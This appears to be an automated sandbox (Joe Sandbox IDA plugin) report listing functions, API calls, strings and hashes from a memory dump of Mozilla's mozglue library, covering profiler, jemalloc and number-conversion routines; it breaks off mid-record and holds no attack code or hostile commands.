Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: 9ce08e143faf580395e3e7d2e743f9c1f25475f3777a60790e00772d016bdc68
Instruction ID: 59971c288c8fa37a3f27bca677fd319baf38c452b156f8e384af07db6fcfa218
Opcode Fuzzy Hash: 9ce08e143faf580395e3e7d2e743f9c1f25475f3777a60790e00772d016bdc68
Instruction Fuzzy Hash: DA925EB1A083428FD724CF18C49079BB7E1BFC5308F548A2DE5999B751DB30E949CB9A

Function 6C692E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C692ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C692EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C692F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C693214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C693242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6936BF

Strings

set , xrefs: 6C6936EC
get , xrefs: 6C693205
MOZ_PROFILER_SYMBOLICATE, xrefs: 6C69378D

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: 4690e0c9d17148194232e80b2b556ec0c017f0e87cc19805995b89a5866c8204
Instruction ID: 864978e31e0ac0631c28070d61ad4fa08d5e449b7136aa250b2f35986f95a1ed
Opcode Fuzzy Hash: 4690e0c9d17148194232e80b2b556ec0c017f0e87cc19805995b89a5866c8204
Instruction Fuzzy Hash: EB325E706083828FD724CF24C4906AFB7E2AFCA318F54882DE59987751DB31D94ACB5B

Function 6C687E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

vll, xrefs: 6C688207
name, xrefs: 6C687ECF, 6C688335
(pre-xul), xrefs: 6C687E88
schema, xrefs: 6C6881E3, 6C688311
data, xrefs: 6C688280, 6C6883E1

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vll
API String ID: 3412268980-1513030651
Opcode ID: fbc247660fd93f67e2f9cad54b97bc709ecc05da1ce7fb6cc2fae88c5f67be89
Instruction ID: 36f339076576911bf37ca3a9322f1af24e8b9dfc0b19dc204b965d9233ad7c17
Opcode Fuzzy Hash: fbc247660fd93f67e2f9cad54b97bc709ecc05da1ce7fb6cc2fae88c5f67be89
Instruction Fuzzy Hash: FBE16EB1B043408BC710CF69884165BFBE9FF86318F54892DE895AB791DB70DD098B9A

Function 6C66D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C67D1C5), ref: 6C66D4F2
LeaveCriticalSection.KERNEL32(6C6CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C67D1C5), ref: 6C66D50B

Part of subcall function 6C64CFE0: EnterCriticalSection.KERNEL32(6C6CE784), ref: 6C64CFF6
Part of subcall function 6C64CFE0: LeaveCriticalSection.KERNEL32(6C6CE784), ref: 6C64D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C67D1C5), ref: 6C66D52E
EnterCriticalSection.KERNEL32(6C6CE7DC), ref: 6C66D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C66D6A6
LeaveCriticalSection.KERNEL32(6C6CE7DC), ref: 6C66D712
LeaveCriticalSection.KERNEL32(6C6CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C67D1C5), ref: 6C66D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C66D7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C66D82C
<jemalloc>, xrefs: 6C66D827

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 36822ca866c3098979ff668013d25c01f736b23f2bccf303e6c8e01cf5807ec7
Instruction ID: 6dd30f9f20e37a9f4cbd8c741c0e917582ef91dacf03b0b5a2fcac91478fa2a1
Opcode Fuzzy Hash: 36822ca866c3098979ff668013d25c01f736b23f2bccf303e6c8e01cf5807ec7
Instruction Fuzzy Hash: A4919171A047418FD714CF2AC49166ABBF1EB89718F24892EE55AC7F81D730E844CB9B

Function 6C6A4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C6A4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A4F2E
moz_xmalloc.MOZGLUE ref: 6C6A4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C6A4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A52E6
Sleep.KERNEL32(00000010), ref: 6C6A5481
free.MOZGLUE(?), ref: 6C6A5498

Strings

(, xrefs: 6C6A5250

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 94c83dbf7eb0fa976ba413e7737f00f4f2b77ca070e4374bc661aa88974430ee
Instruction ID: 571c67044761589186968f78e41042d22d1ae7d004801603cdd176dda3378ab0
Opcode Fuzzy Hash: 94c83dbf7eb0fa976ba413e7737f00f4f2b77ca070e4374bc661aa88974430ee
Instruction Fuzzy Hash: 2DF1E271A18B008FC716CF39C89062BB7F5AFD6384F458B2EF946A7651DB31D8428B85

Function 6C669E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C669EB8
LeaveCriticalSection.KERNEL32(?), ref: 6C669F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C669F34
LeaveCriticalSection.KERNEL32(?), ref: 6C66A823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C66A83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C66A849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66A8B1, 6C66A8D4, 6C66A8EF

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: 7eabab48718e38a3176b58524891c2bcd30b4b5cd9a14e862694b60120b64093
Instruction ID: 8eae21772bd5fdc7630fb711eefdf1fa07ccde97723f9af2406f20944b69d8ce
Opcode Fuzzy Hash: 7eabab48718e38a3176b58524891c2bcd30b4b5cd9a14e862694b60120b64093
Instruction Fuzzy Hash: 60727E72A157218FD304CF2AC540615FBE1BF85328F29C76DE8699BB92D335E841CB86

Function 6C692C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C692C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C692C61

Part of subcall function 6C644DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C644E5A
Part of subcall function 6C644DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C644E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C692C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C692E2D

Part of subcall function 6C6581B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6581DE

Strings

expected a Time entry, xrefs: 6C692E36
(root), xrefs: 6C69354F
ProfileBuffer parse error: %s, xrefs: 6C692E3B

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: e79c1903fe8e2dcb59b0e03e525f430d7f648b7ccb375087cfb115245c37be65
Instruction ID: c87f468b8ed543d5ea01f81c8f0c94a516b89bcdc856eeec8c89441aad201edf
Opcode Fuzzy Hash: e79c1903fe8e2dcb59b0e03e525f430d7f648b7ccb375087cfb115245c37be65
Instruction Fuzzy Hash: 9D91B0B06087828FC724CF24C48469FB7E1AFCA358F10492DE59A9B761DB30D949CB5E

Function 6C6A9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C6A9F3D
__aulldiv.LIBCMT ref: 6C6A9F77
__aullrem.LIBCMT ref: 6C6A9F8C
__aulldiv.LIBCMT ref: 6C6AA023

Strings

-Infinity, xrefs: 6C6A9E60, 6C6A9E7B
NaN, xrefs: 6C6A9EAB

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: de02da5fdf704a206d885529dfed7d612e289534a0ed6a93abfe173478626484
Instruction ID: 1b3b411bc2573bcd0fab87f437579f90ed39da12ece8ec09610a449a9f55ac83
Opcode Fuzzy Hash: de02da5fdf704a206d885529dfed7d612e289534a0ed6a93abfe173478626484
Instruction Fuzzy Hash: DBC1AE31A043189BDB14CFE9C8907DEB7B6EB89308F14452AD405ABB81D771AD4ACF99

Function 6C64D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

1, xrefs: 6C64DBDD
0, xrefs: 6C64DC7F
, xrefs: 6C64DA88
9, xrefs: 6C64DE7F
-, xrefs: 6C64D7DD
0, xrefs: 6C64D852
@, xrefs: 6C64DAF6
8, xrefs: 6C64DC08

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: 6ea5534c8f8793adefeafc0f7d9d51afa2168f182cac1663667caa99e5c6a05a
Instruction ID: 533e3054bf7875a4fd8fa7b55cf1d296d9e27133b1a4764841cc45ceaa46f275
Opcode Fuzzy Hash: 6ea5534c8f8793adefeafc0f7d9d51afa2168f182cac1663667caa99e5c6a05a
Instruction Fuzzy Hash: 8062CF71A0C3458FDB15CF19C0907AEBBF2AF86358F18CA4DE4D54BA91C3359985CB8A

Function 6C6B545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6B8A4B

Strings

~qdl, xrefs: 6C6B5740, 6C6B56C7, 6C6B9459, 6C6B9269, 6C6B5703, 6C6B921F, 6C6B948F

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memset
String ID: ~qdl
API String ID: 2221118986-3120728324
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: a7921296c646091a7d7b6392b2b2e9cd993e33ff51eaead5e286154cc844a9fe
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 36B10872E0521B8FDB14CF68CC907E8B7B2EF95314F1802A9C549EB791D730A995CB94

Function 6C6B542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6B88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6B925C

Strings

~qdl, xrefs: 6C6B5740, 6C6B56C7, 6C6B9459, 6C6B9269, 6C6B5703, 6C6B921F, 6C6B948F

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memset
String ID: ~qdl
API String ID: 2221118986-3120728324
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: f00248e6138169e2629fd0c8b47c17132ca65f6bf921d26e9e350f6f4e665e1e
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 79B1D472E0420A8BCB14CF68C8816EDB7B2EF95314F180279C949EB795D730A999CB94

Function 6C64BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C64C1CB
__aulldiv.LIBCMT ref: 6C64C24C
__aulldiv.LIBCMT ref: 6C64C348
__aullrem.LIBCMT ref: 6C64C365
__aulldiv.LIBCMT ref: 6C64C37D

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: 8b2ced3a8b37cd2098293c1ac4e5565967c86b79f0b4298bec1b6e39bc760d6c
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: 1C321532B146119FC718DE2CC890656BBE6AFC9310F09C66DE896CB395D730ED05CB91

Function 6C686CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C686D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C686E1E

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: d8b288561d1fb0953104f623c6da74af7a4454a798ea73408946e0d19dbc052d
Instruction ID: 25a95b0a6dfb59f2ceb49d3126b97910245070df8ccb3ece174e4574ce78491f
Opcode Fuzzy Hash: d8b288561d1fb0953104f623c6da74af7a4454a798ea73408946e0d19dbc052d
Instruction Fuzzy Hash: AAA17F706193818FC715CF25C4947AEFBE2BF89308F04495DE48A87751DB70E949CBA6

Function 6C664640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C664777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C665585, 6C6655A8, 6C6655C3, 6C665624

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: 84664efe8e32c0a9f1394b7394f0d12af477e7684cc5907ea1a4fe6f9181e484
Instruction ID: fc95ffd09c2dd80345907d15b17de2e06dcb4893e184e31a3b255fdd98cdc682
Opcode Fuzzy Hash: 84664efe8e32c0a9f1394b7394f0d12af477e7684cc5907ea1a4fe6f9181e484
Instruction Fuzzy Hash: 0EB27F71A056018FC308CF1AC591725FBE2BFC5324B29C75DE46A8BBA5D771E841CB8A

Function 6C6A85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6A8C7C
__aulldiv.LIBCMT ref: 6C6A8DD7

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 782e6dd24626e96e92f09485896220cb92a28514848d85b7702f7d1a83c4c2ec
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 33328F71F001598BDF18CE9CC8A17AEF7B2FB88304F15853AD506BB7A0DA349D468B95

Function 6C6B76E3 Relevance: 1.8, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

~qdl, xrefs: 6C6B793C, 6C6B79FB, 6C6B7796, 6C6B7B0B, 6C6B7E0B, 6C6B79C0

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID:
String ID: ~qdl
API String ID: 0-3120728324
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: 2718f744e649668d5a597a2d62f05a50bc105ad42fdf461dc8c232eb5fedbe58
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: 4E32F871E0061A8FCB14CF98C990AADFBB2FF88308F548169C549B7745D731A996CF94

Function 6C6B6E63 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

~qdl, xrefs: 6C6B793C, 6C6B79FB, 6C6B7C03, 6C6B7C72, 6C6B7B0B, 6C6B7E0B, 6C6B79C0

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID:
String ID: ~qdl
API String ID: 0-3120728324
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: 248e4a5dc08479e4951180b3f903db5618a8e42ba587109df43138819203ecb6
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: 4722E471E002198FCB14CF98C890AADF7F2BF88304F6481AAC949B7745D731A996CF94

Function 6C685C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C654A63,?,?), ref: 6C685F06

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 5d6fac8fbd3b02fdc49d79d1f7b33ab4f41be2aa372acbb496ddfb08e4c47de1
Instruction ID: 09d7baf5898211094b3683a8a1dee50dc74cacbf3eb655d91c329092f8507cd2
Opcode Fuzzy Hash: 5d6fac8fbd3b02fdc49d79d1f7b33ab4f41be2aa372acbb496ddfb08e4c47de1
